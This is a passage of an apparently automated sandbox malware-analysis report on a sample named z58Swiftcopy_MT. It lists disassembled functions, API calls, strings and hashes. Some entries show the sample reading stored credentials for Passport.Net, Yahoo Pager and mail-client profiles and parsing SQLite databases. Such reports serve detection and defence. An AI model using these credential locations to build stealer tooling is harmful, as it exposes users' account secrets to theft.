                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AddressProc$LibraryLoad_mbscpy$ByteCharFreeLocalMultiWidestrlen
                                                                                                                                                                                                                                      • String ID: Passport.Net\*
                                                                                                                                                                                                                                      • API String ID: 2329438634-3671122194
                                                                                                                                                                                                                                      • Opcode ID: ac5e77b6697e9ee94173e4e8c28d13e758311ae62a0014aa2ab67cc322a84761
                                                                                                                                                                                                                                      • Instruction ID: cbd5109d0b46f6ae46d16b49076c688dceaf9cc559dd015bf255ce3d8649dee3
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ac5e77b6697e9ee94173e4e8c28d13e758311ae62a0014aa2ab67cc322a84761
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 98316F76900109ABDB10EFA6DD45DAEB7B9EF89300F10007BE605F7291DB389A04CB59
                                                                                                                                                                                                                                      Function 004032B7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 82stringCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00403166: strchr.MSVCRT ref: 0040327B
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040330B
                                                                                                                                                                                                                                      • GetPrivateProfileSectionA.KERNEL32(Personalities,?,000003FE,?), ref: 00403325
                                                                                                                                                                                                                                      • strchr.MSVCRT ref: 0040335A
                                                                                                                                                                                                                                        • Part of subcall function 004023E5: _mbsicmp.MSVCRT ref: 0040241D
                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0040339C
                                                                                                                                                                                                                                        • Part of subcall function 004023E5: _mbscmp.MSVCRT ref: 004023F9
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: strchr$PrivateProfileSection_mbscmp_mbsicmpmemsetstrlen
                                                                                                                                                                                                                                      • String ID: Personalities
                                                                                                                                                                                                                                      • API String ID: 2103853322-4287407858
                                                                                                                                                                                                                                      • Opcode ID: 5b98b57a55da65def1d776efa7645d3f4e73defe10c1c776d6f69e105cfa83b8
                                                                                                                                                                                                                                      • Instruction ID: 7d10b282734f65fdb38f5d5bab0bdada953f1de7ece3d1168d652590bcd45cd6
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5b98b57a55da65def1d776efa7645d3f4e73defe10c1c776d6f69e105cfa83b8
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6C21A872A041486AEB11EF699C81ADEBB7C9B51305F14007BFB04F7181DA7CDB46C66D
                                                                                                                                                                                                                                      Function 00444551 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 51registryCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00444573
                                                                                                                                                                                                                                        • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
                                                                                                                                                                                                                                        • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00410E73,?,?,?,?,00410E73,00000000,?,?), ref: 00410AF8
                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CloseOpenQueryValuememset
                                                                                                                                                                                                                                      • String ID: EOptions string$Software\Yahoo\Pager$Yahoo! User ID
                                                                                                                                                                                                                                      • API String ID: 1830152886-1703613266
                                                                                                                                                                                                                                      • Opcode ID: c25afbc6681bd6f67a4f4f243a5a512b3b390374a029d0210c15856865fede48
                                                                                                                                                                                                                                      • Instruction ID: e49b40feb516e52fd010a51085a75c79e183d02607987ed0dc43077d9115a6c0
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c25afbc6681bd6f67a4f4f243a5a512b3b390374a029d0210c15856865fede48
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E80196B6A00118BBEF11AA569D01F9A777CDF90355F1000A6FF08F2212E6749F599698
                                                                                                                                                                                                                                      Function 00406D77 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29windowCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?), ref: 00406D87
                                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 00406DAF
                                                                                                                                                                                                                                      • MessageBoxA.USER32(00000000,?,Error,00000030), ref: 00406DC8
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ErrorLastMessagesprintf
                                                                                                                                                                                                                                      • String ID: Error$Error %d: %s
                                                                                                                                                                                                                                      • API String ID: 1670431679-1552265934
                                                                                                                                                                                                                                      • Opcode ID: 01084951b307502bfaf43d4fbd3e54dffba0eab1b535d90173241ec551fbeaa7
                                                                                                                                                                                                                                      • Instruction ID: a7eabb7ac59324d00fe13b249bdc4a7432a02f94c8438c44d3dfd779c6ab1540
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 01084951b307502bfaf43d4fbd3e54dffba0eab1b535d90173241ec551fbeaa7
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AEF0A77A8001086BDB10A7A4DC05FA676BCBB44344F1500B6B945F2151EA74DA058F98
                                                                                                                                                                                                                                      Function 004309ED Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 238COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • unknown column "%s" in foreign key definition, xrefs: 00430C59
                                                                                                                                                                                                                                      • foreign key on %s should reference only one column of table %T, xrefs: 00430A3D
                                                                                                                                                                                                                                      • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 00430A65
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpy
                                                                                                                                                                                                                                      • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                                                                                                                                                                      • API String ID: 3510742995-272990098
                                                                                                                                                                                                                                      • Opcode ID: e0adb55311b2422536510ae49f56a80dd71403a501fe8d14b1b43f202caa477a
                                                                                                                                                                                                                                      • Instruction ID: 56a33166dce8f22c91c9f8fabbbf61fd3f81eb66f6c7064346fd2a8112c6bbd6
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e0adb55311b2422536510ae49f56a80dd71403a501fe8d14b1b43f202caa477a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 32A14A71A00209DFCB14DF98D5909AEBBF1FF49704F24925EE805AB312D739EA41CB98
                                                                                                                                                                                                                                      Function 0043D62C Relevance: 7.7, APIs: 4, Strings: 1, Instructions: 224COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memset
                                                                                                                                                                                                                                      • String ID: H
                                                                                                                                                                                                                                      • API String ID: 2221118986-2852464175
                                                                                                                                                                                                                                      • Opcode ID: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
                                                                                                                                                                                                                                      • Instruction ID: 41a1901620add3bbd0c629c105807ca0f7ae5b253a5bd6696a221ab72d79fc9a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C0916C75D00219DFDF24DFA5D881AEEB7B5FF48300F10849AE959AB201E734AA45CF98
                                                                                                                                                                                                                                      Function 0042563B Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 176COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpy
                                                                                                                                                                                                                                      • String ID: out of memory$statement aborts at %d: [%s] %s$string or blob too big
                                                                                                                                                                                                                                      • API String ID: 3510742995-3170954634
                                                                                                                                                                                                                                      • Opcode ID: f23b84750750ded9f2ffe7c3d94913c2e203849674d50945dde1510e429b7173
                                                                                                                                                                                                                                      • Instruction ID: e987c9c84479fff69dc62f11a90029b17cbd8b5ab9a96ddea988199e68ce63eb
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f23b84750750ded9f2ffe7c3d94913c2e203849674d50945dde1510e429b7173
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2361C235B006259FCB04DF68E484BAEFBF1BF44314F55809AE904AB352D738E980CB98
                                                                                                                                                                                                                                      Function 0041DB51 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 176COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 0041384F: memcpy.MSVCRT(?,00417664,00000004,?,CwA,00417664,?,?,00417743,?,?,?,?), ref: 0041385C
                                                                                                                                                                                                                                      • memcmp.MSVCRT(?,?,00000004,00000000,?,?,0041DE5E,?,?,?,?,00436073), ref: 0041DBAE
                                                                                                                                                                                                                                      • memcmp.MSVCRT(?,SQLite format 3,00000010,00000000,?,?,0041DE5E,?,?,?), ref: 0041DBDB
                                                                                                                                                                                                                                      • memcmp.MSVCRT(?,@ ,00000003,?,?,?,00000000,?,?,0041DE5E,?,?,?), ref: 0041DC47
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcmp$memcpy
                                                                                                                                                                                                                                      • String ID: @ $SQLite format 3
                                                                                                                                                                                                                                      • API String ID: 231171946-3708268960
                                                                                                                                                                                                                                      • Opcode ID: 88de2badfc1d71e4fe38edb0c0075e708ac09094af51dabb08af60798be72297
                                                                                                                                                                                                                                      • Instruction ID: bab8e9e22e0f3e3322208b515ecc9156aa125374c4e71f07eecd891e4e8170cf
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 88de2badfc1d71e4fe38edb0c0075e708ac09094af51dabb08af60798be72297
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1851BFB1E002099BDB20DF69C981BEAB7F4AF54304F10056FE44597742E7B8EA85CB98
                                                                                                                                                                                                                                      Function 00414625 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 132COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpy$memset
                                                                                                                                                                                                                                      • String ID: winWrite1$winWrite2
                                                                                                                                                                                                                                      • API String ID: 438689982-3457389245
                                                                                                                                                                                                                                      • Opcode ID: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
                                                                                                                                                                                                                                      • Instruction ID: c2532708ffcca3880dfc28061b61c902a2330187b6102c2a8a28e688d44e82e0
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 86418072A00209EBDF00DF95CC85BDE7775FF85315F14411AE924A7280D778EAA4CB99
                                                                                                                                                                                                                                      Function 004144FD Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 109COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpymemset
                                                                                                                                                                                                                                      • String ID: winRead
                                                                                                                                                                                                                                      • API String ID: 1297977491-2759563040
                                                                                                                                                                                                                                      • Opcode ID: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                                                                                                                                                                                                                                      • Instruction ID: 3ec02e552038d814b148e8dc6d2e6fcfdb14063e9eab1ef980803e4d567ed084
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DC31C372A00218ABDF10DF69CC46ADF776AEF84314F184026FE14DB241D334EE948BA9
                                                                                                                                                                                                                                      Function 00449550 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 85COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0044955B
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0044956B
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,00000000,?,00000000), ref: 004495C8
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,?,?,?,00000000,00000000,?,00000000), ref: 00449616
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpymemset
                                                                                                                                                                                                                                      • String ID: gj
                                                                                                                                                                                                                                      • API String ID: 1297977491-4203073231
                                                                                                                                                                                                                                      • Opcode ID: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                                                                                                                                                                                                                                      • Instruction ID: 902d5c3a1247e7abcff0c4a84da7d54d3a467651d8a5431b25503c8ae0e770b6
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AF216A733443402BF7259A3ACC41B5B775DDFCA318F16041EF68A8B342E67AEA058715
                                                                                                                                                                                                                                      Function 0040AB66 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 57COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                                                                                                                                                                                        • Part of subcall function 00406D33: WriteFile.KERNEL32(0044CBC0,00000001,00000000,`-v,00000000,?,?,0040A7BE,00000001,0044CBC0,762D0A60), ref: 00406D4D
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040AB9C
                                                                                                                                                                                                                                        • Part of subcall function 00411004: memcpy.MSVCRT(?,&lt;,00000004,?,?,00000000,0040ABBD,?,?), ref: 00411072
                                                                                                                                                                                                                                        • Part of subcall function 0040A4E6: _mbscpy.MSVCRT(00000000,?,0040ABD2,?,?,?), ref: 0040A4EB
                                                                                                                                                                                                                                        • Part of subcall function 0040A4E6: _strlwr.MSVCRT ref: 0040A52E
                                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 0040ABE1
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FileWrite_mbscpy_strlwrmemcpymemsetsprintfstrlen
                                                                                                                                                                                                                                      • String ID: <%s>%s</%s>$</item>$<item>
                                                                                                                                                                                                                                      • API String ID: 3337535707-2769808009
                                                                                                                                                                                                                                      • Opcode ID: 94fb3ee970197c35f89b73c5c9c871d1a7be37581e6fd1bc9edd3009dd58cb65
                                                                                                                                                                                                                                      • Instruction ID: d3fada9700ccfca67da5e06a008153287a477451e6e6bd371d19fa9d49944530
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 94fb3ee970197c35f89b73c5c9c871d1a7be37581e6fd1bc9edd3009dd58cb65
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 50110631A00216BFEB11AF18CD42F99BB64FF0831CF10402AF509665A1DB79B970CB98
                                                                                                                                                                                                                                      Function 004090B0 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetParent.USER32(?), ref: 004090C2
                                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 004090CF
                                                                                                                                                                                                                                      • GetClientRect.USER32(00000000,?), ref: 004090DA
                                                                                                                                                                                                                                      • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 004090EA
                                                                                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00409106
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Window$Rect$ClientParentPoints
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 4247780290-0
                                                                                                                                                                                                                                      • Opcode ID: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                                                                                                                                                                                                                      • Instruction ID: bdfce0b549e0f997c013470e25be1f804495b962c90005f3873202e4793523b9
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6A012D36801129BBDB119FA59C89EFFBFBCFF46750F044125FD05A2141D77455018BA5
                                                                                                                                                                                                                                      Function 0040B994 Relevance: 7.5, APIs: 5, Instructions: 44windowCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SendMessageA.USER32(?,0000000B,00000000,00000000), ref: 0040B9B1
                                                                                                                                                                                                                                        • Part of subcall function 00406C62: LoadCursorA.USER32(00000000,00007F02), ref: 00406C69
                                                                                                                                                                                                                                        • Part of subcall function 00406C62: SetCursor.USER32(00000000), ref: 00406C70
                                                                                                                                                                                                                                      • SendMessageA.USER32(?,00001009,00000000,00000000), ref: 0040B9D4
                                                                                                                                                                                                                                        • Part of subcall function 0040B903: sprintf.MSVCRT ref: 0040B929
                                                                                                                                                                                                                                        • Part of subcall function 0040B903: sprintf.MSVCRT ref: 0040B953
                                                                                                                                                                                                                                        • Part of subcall function 0040B903: _mbscat.MSVCRT ref: 0040B966
                                                                                                                                                                                                                                        • Part of subcall function 0040B903: SendMessageA.USER32(?,00000401,00000000,?), ref: 0040B98C
                                                                                                                                                                                                                                      • SetCursor.USER32(?,?,0040CBD2), ref: 0040B9F9
                                                                                                                                                                                                                                      • SetFocus.USER32(?,?,?,0040CBD2), ref: 0040BA0B
                                                                                                                                                                                                                                      • SendMessageA.USER32(?,0000000B,00000001,00000000), ref: 0040BA22
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSend$Cursor$sprintf$FocusLoad_mbscat
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2374668499-0
                                                                                                                                                                                                                                      • Opcode ID: c223344c3a39cb50a824543c0933464b2b2e3202265bd74e385ec46d38a17b1f
                                                                                                                                                                                                                                      • Instruction ID: f32a2dbc35f7bf6d698eec3472f2a5e56a7287d41e7566127b95ec9cf4f32314
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c223344c3a39cb50a824543c0933464b2b2e3202265bd74e385ec46d38a17b1f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 450129B5204604EFD326AB75DC85FA6B7E8FF48305F0504B9F2499B271CA716D018B14
                                                                                                                                                                                                                                      Function 00409A32 Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,762D0A60,?,00000000), ref: 00409A3E
                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,762D0A60,?,00000000), ref: 00409A4C
                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,762D0A60,?,00000000), ref: 00409A5D
                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,762D0A60,?,00000000), ref: 00409A74
                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,762D0A60,?,00000000), ref: 00409A7D
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ??3@
